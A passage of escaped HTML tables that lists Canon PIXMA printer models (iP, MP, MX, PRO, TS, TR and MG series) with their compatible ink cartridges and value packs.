align=\"center\">PIXMA iP1300</td>\n<td>CL-41 (Colour)</td>\n</tr>\n<tr>\n<td>PG-40 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-40/CL-41 Value Pack</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA iP2770 / iP2772</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA iP2870S</td>\n<td>CL-746 (Colour)</td>\n</tr>\n<tr>\n<td>CL-746S (Colour)</td>\n</tr>\n<tr>\n<td>PG-745 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745S (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table border=\"1\" width=\"378\" cellpadding=\"10\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA iP4200</td>\n<td>CLI-8 (Black)</td>\n</tr>\n<tr>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"10\" align=\"center\">PIXMA iP7270</td>\n<td>CLI-751 (Black)</td>\n</tr>\n<tr>\n<td>CLI-751 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751 (Yellow)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Black)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-750 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-750XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"12\" align=\"center\">PIXMA iP8770</td>\n<td>CLI-751 (Black)</td>\n</tr>\n<tr>\n<td>CLI-751 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751 (Gray)</td>\n</tr>\n<tr>\n<td>CLI-751 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751 (Yellow)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Black)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Gray)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-750 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-750XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"11\" align=\"center\">PIXMA iX6770</td>\n<td>CLI-751 (Black)</td>\n</tr>\n<tr>\n<td>CLI-751 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751 (Yellow)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Black)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-750 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-750XL (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-755XXL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"11\" align=\"center\">PIXMA iX6870</td>\n<td>CLI-751 (Black)</td>\n</tr>\n<tr>\n<td>CLI-751 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751 (Yellow)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Black)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-750 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-750XL (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-755XXL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MG2570S</td>\n<td>CL-746 (Colour)</td>\n</tr>\n<tr>\n<td>CL-746S (Colour)</td>\n</tr>\n<tr>\n<td>CL-746XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-745 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745S (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MG2577S</td>\n<td>CL-746 (Colour)</td>\n</tr>\n<tr>\n<td>CL-746S (Colour)</td>\n</tr>\n<tr>\n<td>CL-746XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-745 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745S (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745XL (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table border=\"1\" width=\"378\" cellpadding=\"10\"><tbody><tr align=\"center\"><td width=\"170\"><strong>Model</strong></td><td width=\"208\"><strong>Cartridge / Bottle</strong></td></tr><tr><td rowspan=\"5\" align=\"center\">PIXMA MG3570</td><td>CL-741 (Colour)</td></tr><tr><td>CL-741XL (Colour)</td></tr><tr><td>PG-740 (Pigment Black)</td></tr><tr><td>PG-740/CL-741 Value Pack</td></tr><tr><td>PG-740XL (Pigment Black)</td></tr><tr><td rowspan=\"5\" align=\"center\">PIXMA MG3670</td><td>CL-741 (Colour)</td></tr><tr><td>CL-741XL (Colour)</td></tr><tr><td>PG-740 (Pigment Black)</td></tr><tr><td>PG-740/CL-741 Value Pack</td></tr><tr><td>PG-740XL (Pigment Black)</td></tr><tr><td rowspan=\"10\" align=\"center\">PIXMA MG7570</td><td>CLI-751 (Black)</td></tr><tr><td>CLI-751 (Cyan)</td></tr><tr><td>CLI-751 (Gray)</td></tr><tr><td>CLI-751 (Magenta)</td></tr><tr><td>CLI-751 (Yellow)</td></tr><tr><td>CLI-751XL (Black)</td></tr><tr><td>CLI-751XL (Cyan)</td></tr><tr><td>CLI-751XL (Gray)</td></tr><tr><td>CLI-751XL (Magenta)</td></tr><tr><td>CLI-751XL (Yellow)</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA MP160</td><td>CL-41 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA MP170</td><td>CL-41 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA MP180</td><td>CL-41 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td rowspan=\"5\" align=\"center\">PIXMA MP228</td><td>CL-41 (Colour)</td></tr><tr><td>CL-831 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td>PG-830 (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MP237</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MP245</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MP258</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MP276</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr></tbody></table><table border=\"1\" width=\"378\" cellpadding=\"10\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MP287</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA MP460</td>\n<td>CL-41 (Colour)</td>\n</tr>\n<tr>\n<td>PG-40 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-40/CL-41 Value Pack</td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA MP476</td>\n<td>CL-41 (Colour)</td>\n</tr>\n<tr>\n<td>CL-831 (Colour)</td>\n</tr>\n<tr>\n<td>PG-40 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-40/CL-41 Value Pack</td>\n</tr>\n<tr>\n<td>PG-830 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MP486</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MP496</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MP497</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA MP500</td>\n<td>CLI-8 (Black)</td>\n</tr>\n<tr>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA MP520</td>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA MP530</td>\n<td>CLI-8 (Black)</td>\n</tr>\n<tr>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA MP568</td>\n<td>CLI-821 (Black)</td>\n</tr>\n<tr>\n<td>CLI-821 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-821 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-821 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-820 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA MP600</td>\n<td>CLI-8 (Black)</td>\n</tr>\n<tr>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table width=\"378\" border=\"1\" cellpadding=\"10\">\n  <tbody>\n    <tr align=\"center\">\n      <td width=\"170\"><strong>Model</strong></td>\n      <td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP610</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP628</td>\n      <td>CLI-821 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-820 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP638</td>\n      <td>CLI-821 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-820 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP648</td>\n      <td>CLI-821 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-820 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP800</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP800R</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP810</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP830</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"7\" align=\"center\">PIXMA MP970</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Photo Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Photo Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP988</td>\n      <td>CLI-821 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Gray)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-820 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP996</td>\n      <td>CLI-821 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Gray)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-820 (Pigment Black)</td>\n    </tr>\n  </tbody>\n</table>\n<table width=\"378\" border=\"1\" cellpadding=\"10\">\n  <tbody>\n  <tr align=\"center\">\n    <td width=\"170\"><strong>Model</strong></td>\n    <td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n  </tr>\n  <tr>\n    <td rowspan=\"5\" align=\"center\">PIXMA MX308</td>\n    <td>CL-41 (Colour)</td>\n  </tr>\n  <tr>\n    <td>CL-831 (Colour)</td>\n  </tr>\n  <tr>\n    <td>PG-40 (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td>PG-40/CL-41 Value Pack</td>\n  </tr>\n  <tr>\n    <td>PG-830 (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td rowspan=\"6\" align=\"center\">PIXMA MX328</td>\n    <td>CL-811 (Colour)</td>\n  </tr>\n  <tr>\n    <td>CL-811XL (Colour)</td>\n  </tr>\n  <tr>\n    <td>PG-810 (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td>PG-810 Twin Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810/CL-811 Value Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810XL (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td rowspan=\"6\" align=\"center\">PIXMA MX338</td>\n    <td>CL-811 (Colour)</td>\n  </tr>\n  <tr>\n    <td>CL-811XL (Colour)</td>\n  </tr>\n  <tr>\n    <td>PG-810 (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td>PG-810 Twin Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810/CL-811 Value Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810XL (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td rowspan=\"6\" align=\"center\">PIXMA MX347</td>\n    <td>CL-811 (Colour)</td>\n  </tr>\n  <tr>\n    <td>CL-811XL (Colour)</td>\n  </tr>\n  <tr>\n    <td>PG-810 (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td>PG-810 Twin Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810/CL-811 Value Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810XL (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td rowspan=\"6\" align=\"center\">PIXMA MX366</td>\n    <td>CL-811 (Colour)</td>\n  </tr>\n  <tr>\n    <td>CL-811XL (Colour)</td>\n  </tr>\n  <tr>\n    <td>PG-810 (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td>PG-810 Twin Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810/CL-811 Value Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810XL (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td rowspan=\"6\" align=\"center\">PIXMA MX426</td>\n    <td>CL-811 (Colour)</td>\n  </tr>\n  <tr>\n    <td>CL-811XL (Colour)</td>\n  </tr>\n  <tr>\n    <td>PG-810 (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td>PG-810 Twin Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810/CL-811 Value Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810XL (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td rowspan=\"5\" align=\"center\">PIXMA MX876</td>\n    <td>CLI-821 (Black)</td>\n  </tr>\n  <tr>\n    <td>CLI-821 (Cyan)</td>\n  </tr>\n  <tr>\n    <td>CLI-821 (Magenta)</td>\n  </tr>\n  <tr>\n    <td>CLI-821 (Yellow)</td>\n  </tr>\n  <tr>\n    <td>PGI-820 (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td rowspan=\"5\" align=\"center\">PIXMA MX886</td>\n    <td>CLI-726 (Black)</td>\n  </tr>\n  <tr>\n    <td>CLI-726 (Cyan)</td>\n  </tr>\n  <tr>\n    <td>CLI-726 (Magenta)</td>\n  </tr>\n  <tr>\n    <td>CLI-726 (Yellow)</td>\n  </tr>\n  <tr>\n    <td>PGI-725 (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td rowspan=\"12\" align=\"center\">PIXMA PRO-1</td>\n    <td>PGI-29 (Chroma Optimizer)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Cyan)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Dark Gray)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Gray)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Light Gray)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Magenta)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Matte Black)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Photo Black)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Photo Cyan)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Photo Magenta)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Red)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Yellow)</td>\n  </tr>\n  </tbody>\n</table>\n<table width=\"378\" border=\"1\" cellpadding=\"10\">\n  <tbody>\n    <tr align=\"center\">\n      <td width=\"170\"><strong>Model</strong></td>\n      <td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n    </tr>\n    <tr>\n      <td rowspan=\"10\" align=\"center\">PIXMA PRO-10</td>\n      <td>PGI-72 (Chroma Optimizer)</td>\n    </tr>\n    <tr>\n      <td>PGI-72 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>PGI-72 (Gray)</td>\n    </tr>\n    <tr>\n      <td>PGI-72 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>PGI-72 (Matte Black)</td>\n    </tr>\n    <tr>\n      <td>PGI-72 (Photo Black)</td>\n    </tr>\n    <tr>\n      <td>PGI-72 (Photo Cyan)</td>\n    </tr>\n    <tr>\n      <td>PGI-72 (Photo Magenta)</td>\n    </tr>\n    <tr>\n      <td>PGI-72 (Red)</td>\n    </tr>\n    <tr>\n      <td>PGI-72 (Yellow)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"8\" align=\"center\">PIXMA PRO-100</td>\n      <td>CLI-42 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-42 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-42 (Gray)</td>\n    </tr>\n    <tr>\n      <td>CLI-42 (Light Gray)</td>\n    </tr>\n    <tr>\n      <td>CLI-42 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-42 (Photo Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-42 (Photo Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-42 (Yellow)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"10\" align=\"center\">PIXMA TR8570</td>\n      <td>CLI-781 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-781 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-781 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-781 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-780 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PGI-780XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA TS207</td>\n      <td>CL-746 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-746S (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-746XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-745 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-745S (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-745XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA TS307</td>\n      <td>CL-746 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-746S (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-746XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-745 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-745S (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-745XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"10\" align=\"center\">PIXMA TS5070</td>\n      <td>CLI-771 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-771 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-771 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-771 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>CLI-771XL (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-771XL (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-771XL (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-771XL (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-770 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PGI-770XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA TS5170</td>\n      <td>CL-741 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-741XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-740 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-740/CL-741 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-740XL (Pigment Black)</td>\n    </tr>\n  </tbody>\n</table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td 